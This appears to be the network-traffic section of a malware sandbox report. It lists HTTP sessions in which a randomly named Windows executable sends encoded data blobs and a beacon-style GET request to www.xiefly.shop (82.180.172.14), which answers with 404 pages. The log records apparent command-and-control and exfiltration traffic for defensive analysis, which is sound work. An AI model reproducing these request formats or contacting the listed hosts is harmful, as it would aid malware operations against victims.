4f 66 62 58 37 4c 76 39 4b 56 73 31 69 2b 68 39 6a 6a 49 55 76 74 64 6d 65 6e 39 35 59 33 61 56 33 4c 4e 6d 38 58 44 39 5a 55 33 75 65 6c 47 38 6f 7a 73 35 75 36 76 45 55 43 62 73 62 6e 4c 42 72 33 61 7a 6e 58 6f 76 30 32 5a 30 6b 7a 34 7a 58 43 38 4c 5a 6c 39 4b 39 68 37 65 6b 6f 6c 62 2f 53 57 7a 4b 43 48 70 6b 6d 45 6c 77 7a 30 54 4b 54 43 73 68 4f 51 64 36 57 56 7a 45 38 66 32 70 65 73 74 42 4f 77 7a 69 75 30 69 77 44 57 6b 78 57 4d 51 6c 4a 78 6e 79 37 4b 37 32 6f 76 43 70 63 58 76 33 54 62 73 35 2f 4e 42 43 77 71 55 4b 65 70 76 65 6a 43 36 64 76 4e 32 4a 2f 41 72 57 57 69 69 54 37 42 56 78 70 7a 65 39 4f 65 30 6f 70 50 6f 47 69 49 55 63 73 44 59 67 42 6f 68 6c 45 66 47 42 75 79 43 62 73 47 4a 45 6e 52 73 66 6e 63 2b 72 36 75 64 35 44 69 32 33 6e 30 47 47 54 70 52 62 61 46 43 6b 35 73 2b 46 73 36 64 50 73 63 62 58 31 31 56 30 34 72 43 79 42 58 41 72 55 37 66 53 35 67 54 59 33 63 51 38 33 4f 71 32 67 63 74 49 34 47 4c 52 44 71 65 32 47 64 68 48 70 6d 48 75 4a 38 32 58 51 32 2b 51 70 77 55 73 2f 2f 61 77 35 41 6f 46 7a 56 7a 66 55 74 4c 36 2b 6c 63 33 48 45 6c 6e 42 34 73 6c 51 57 30 74 6c 72 69 76 70 72 54 51 50 43 75 58 39 30 6d 6f 43 6f 4d 61 56 38 65 78 4f 54 4d 64 74 55 68 77 47 47 6e 51 70 57 77 74 44 4c 34 31 50 50 50 32 73 2f 4a 48 51 76 30 32 57 4f 47 59 6f 4d 75 78 43 70 31 46 4e 4c 6c 30 55 65 6c 52 2b 41 6c 45 6e 54 46 38 78 62 6e 78 58 59 46 31 77 41 4b 4f 4a 31 31 77 63 7a 43 4a 4a 73 72 44 58 33 2b 31 7a 71 55 4c 30 32 6d 42 77 78 31 4e 4d 70 62 47 61 70 54 36 51 61 46 4e 39 2f 6f 35 58 79 79 49 71 75 4b 7a 6b 54 4e 66 69 6d 4a 6c 74 4a 6a 6c 30 72 58 64 4f 6a 41 46 33 48 6c 62 6d 55 79 78 32 2f 45 6a 66 69 34 66 61 77 77 64 2b 45 74 72 36 33 61 68 69 6d 77 6c 44 37 6e 68 6c 58 44 32 75 4c 79 56 66 2f 59 2f 4b 4d 78 77 4d 76 74 31 57 50 67 4d 42 65 47 37 35 79 2f 50 34 4a 46 53 38 4b 43 49 54 70 52 4c 61 6b 4b 36 65 35 59 6d 4c 6a 48 45 77 6e 54 33 6b 75 37 4e 37 79 59 75 74 37 4a 41 4e 44 47 57 65 4e 61 34 33 41 4a 4f 73 51 41 69 62 44 6d 6b 30 70 31 54 72 2f 30 35 53 74 48 74 4a 6e 37 73 62 6d 65 6a 46 31 73 54 72 54 70 70 49 7a 44 75 39 55 6b 44 4a 53 54 53 78 63 62 46 52 38 6f 58 74 69 4b 76 4b 32 4a 6b 73 38 59 4e 39 78 59 45 69 4a 51 76 72 79 75 6a 2b 5a 68 2b 77 72 4b 58 66 6e 31 2f 47 2b 46 36 30 57 72 52 6e 65 59 38 61 77 2b 64 71 4b 63 6d 56 61 49 43 31 6d 35 46 58 69 61 6c 71 2b 76 54 54 6e 6b 56 6e 2f 57 37 76 30 4b 45 50 48 6f 68 2f 44 5a 61 75 51 6b 63 55 58 6e 50 59 47 55 70 75 76 52 6b 69 44 66 79 58 79 56 37 51 46 47 47 67 70 32 6a 62 37 45 49 31 68 75 50 6e 6a 76 79 54 6d Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:50:20.027297020 CET	2572	OUT	Data Raw: 4d 6b 4a 35 65 6f 75 6a 4b 51 46 65 4c 52 59 30 75 43 6b 64 54 50 58 37 6e 65 4d 67 68 72 33 39 75 61 6e 67 77 66 4c 4c 79 61 59 5a 5a 50 4c 4d 34 62 35 55 2b 70 6f 55 46 4c 4a 73 78 54 38 66 78 65 31 54 4e 31 41 42 78 50 6e 59 38 49 51 32 5a 67 Data Ascii: MkJ5eoujKQFeLRY0uCkdTPX7neMghr39uangwfLLyaYZZPLM4b5U+poUFLJsxT8fxe1TN1ABxPnY8IQ2ZgSjdqZsysl7QuEntElqBdJSPpU66QeF0asLe+yKOxeLcgFnvUpkjI7EWvMpjgdbnOSr5zEI7fNlqcfc3H3NgpGszi6iiRloxvJDsJgwO4zBBcNUcaXZMZu4TvwTHCZVo+KeSkaKIeS/LppuqanILV+XE9CqFGxSARF
Feb 28, 2024 15:50:20.196341038 CET	1235	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;br" accept-ranges: bytes content-encoding: br vary: Accept-Encoding content-length: 912 date: Wed, 28 Feb 2024 14:50:20 GMT server: LiteSpeed platform: hostinger Data Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63 Data Ascii: 3Y\|^zsj+ODs2fG \'C\+JK'^H@iRJi=oqHND!)\|$PJb!2LESI\|5ENTOM%hRs@qr2.xS6LK\|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ysf,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2u}""a!Kp<C/!~K\O-m"YIx2ymj\|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c
Feb 28, 2024 15:50:20.196470976 CET	2572	OUT	Data Raw: 47 4f 6a 68 61 49 72 53 76 68 6e 52 49 32 2f 49 48 4f 4a 76 72 72 49 6e 68 38 57 2b 74 46 54 69 57 55 46 6f 47 48 61 64 2f 50 4b 50 31 31 5a 63 66 67 51 47 53 7a 58 62 39 67 45 74 59 4b 34 73 56 32 54 74 64 61 33 52 66 4b 35 6f 5a 6e 48 45 2b 74 Data Ascii: GOjhaIrSvhnRI2/IHOJvrrInh8W+tFTiWUFoGHad/PKP11ZcfgQGSzXb9gEtYK4sV2Ttda3RfK5oZnHE+tlk1cY7KgJcVEQC5R2wtdvFwOBTQqEm/IM4Ljfg/OzsyzCA6BN5YfducM01I6zXGkSnGL6dc6UNTkXk0dzWZpoYcm9BdmPcsVxD4r2NkziYBk3smIky5pF+KfR86dLdo8SQ59KujhM/9F13G8pDnpCNQCtUuVQExDt
Feb 28, 2024 15:50:20.196557999 CET	5144	OUT	Data Raw: 35 4b 6d 30 46 69 6b 39 61 44 54 58 35 6b 37 33 49 47 65 73 56 7a 52 78 39 69 46 4f 63 71 33 67 63 74 38 30 46 70 4a 35 59 61 6c 31 71 78 43 53 74 4c 69 67 59 53 53 35 6c 6f 45 42 6c 69 46 77 31 35 6b 63 56 36 4d 56 55 52 63 48 67 7a 6b 75 39 52 Data Ascii: 5Km0Fik9aDTX5k73IGesVzRx9iFOcq3gct80FpJ5Yal1qxCStLigYSS5loEBliFw15kcV6MVURcHgzku9Rs9LHBj6+uTSQ6OPkvyCRd2OjxaOvl8Aq2q6OkG7i0VTTphb8Esg9x/N2ejyGw2BH3Z1j9xXaFol1QBgiwLECE9mMmn5wbOJ5EKleke5DkvHEMdKOsbxx2ftVCXOL8ivBTOaqrwztPPJWUOOyj7q9GTpqwEAV2vzlO
Feb 28, 2024 15:50:20.196557999 CET	2572	OUT	Data Raw: 6d 6c 79 75 58 75 37 75 52 4d 58 70 77 63 4f 64 50 41 4d 46 73 50 4f 4c 55 31 33 64 76 53 62 66 4e 48 55 76 53 77 35 65 63 58 50 4e 67 4a 6d 4a 61 34 4a 58 41 38 6d 57 73 49 51 49 2b 72 43 7a 6f 50 6d 48 70 30 6b 67 48 34 57 5a 6c 57 6a 34 78 7a Data Ascii: mlyuXu7uRMXpwcOdPAMFsPOLU13dvSbfNHUvSw5ecXPNgJmJa4JXA8mWsIQI+rCzoPmHp0kgH4WZlWj4xzqE7YZLr03OJ43K+uPPaCdKSK6WZumwM3AbIIiakSETT9PXTpYbbE6QDVFdQhTR8iZFU5wqyv6r86h8yeoA/P0si5LLljeREichFLoqrIUUNhv0w3CTyQ+1+Rpictn+21yI7NhOqjFpRzXiXDi71dplGb+SNXsSfOY
Feb 28, 2024 15:50:20.196654081 CET	7716	OUT	Data Raw: 42 54 37 50 61 77 42 37 43 6c 52 67 48 64 54 62 2f 30 65 32 63 38 4c 52 30 74 4d 54 5a 34 57 6a 79 2b 65 61 52 41 44 55 36 6a 6d 74 42 65 54 53 53 4d 49 36 50 72 4a 53 76 66 4b 62 76 59 52 47 30 37 58 62 55 44 76 59 63 67 66 55 78 33 4d 65 4d 71 Data Ascii: BT7PawB7ClRgHdTb/0e2c8LR0tMTZ4Wjy+eaRADU6jmtBeTSSMI6PrJSvfKbvYRG07XbUDvYcgfUx3MeMqfmj+KDqgRWbNRvhlefl0+Mzv/Ng1/fGgcxOdwe3EVGEgN7U+LY/+dEgB55ujwjqvueZgeDBIIui/lc+aNs8VnTkW0YQ2E2uripPq4ZByRfVp1ziJLebEsIZ7Uap7/PDvl0MySfH8nQj9XI++Fc7Tb6RDSmSHcwDPs
Feb 28, 2024 15:50:20.196855068 CET	5144	OUT	Data Raw: 54 71 43 54 7a 77 62 4a 67 69 2f 31 68 41 4f 34 4b 69 64 59 76 56 5a 77 74 77 55 47 31 2f 52 73 31 6a 74 4e 6a 73 33 30 4f 36 77 73 51 64 32 38 62 45 77 6f 38 63 57 6d 4e 79 79 53 2b 76 6a 75 50 39 55 63 64 4f 65 61 56 68 75 65 68 7a 42 2f 52 48 Data Ascii: TqCTzwbJgi/1hAO4KidYvVZwtwUG1/Rs1jtNjs30O6wsQd28bEwo8cWmNyyS+vjuP9UcdOeaVhuehzB/RHAlOz9kDgu17/DuxiLZiFX9biXWy5ZN5HFT/SkYevQdCSN3QuM+Z76kF0NCREAgJwmuBHVEse4hgzhtIB05h1fp4wCkrogZ8jpwkwWP5mxVr3GFaZZsrDwcNkgXu35Hl89ZVi2QxgCJ8k70GdAQyfDL7EqhkxXSvaU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	50280	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:22.712673903 CET	460	OUT	GET /v3ka/?nf8dPP8p=dNjCJvlouN0lJiHsjG6p9lCI/WKfp2VThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/N+g6ypukcRYLCDKiO8=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.xiefly.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:50:22.881776094 CET	1286	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;;;" accept-ranges: bytes content-length: 2457 date: Wed, 28 Feb 2024 14:50:22 GMT server: LiteSpeed platform: hostinger Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewp
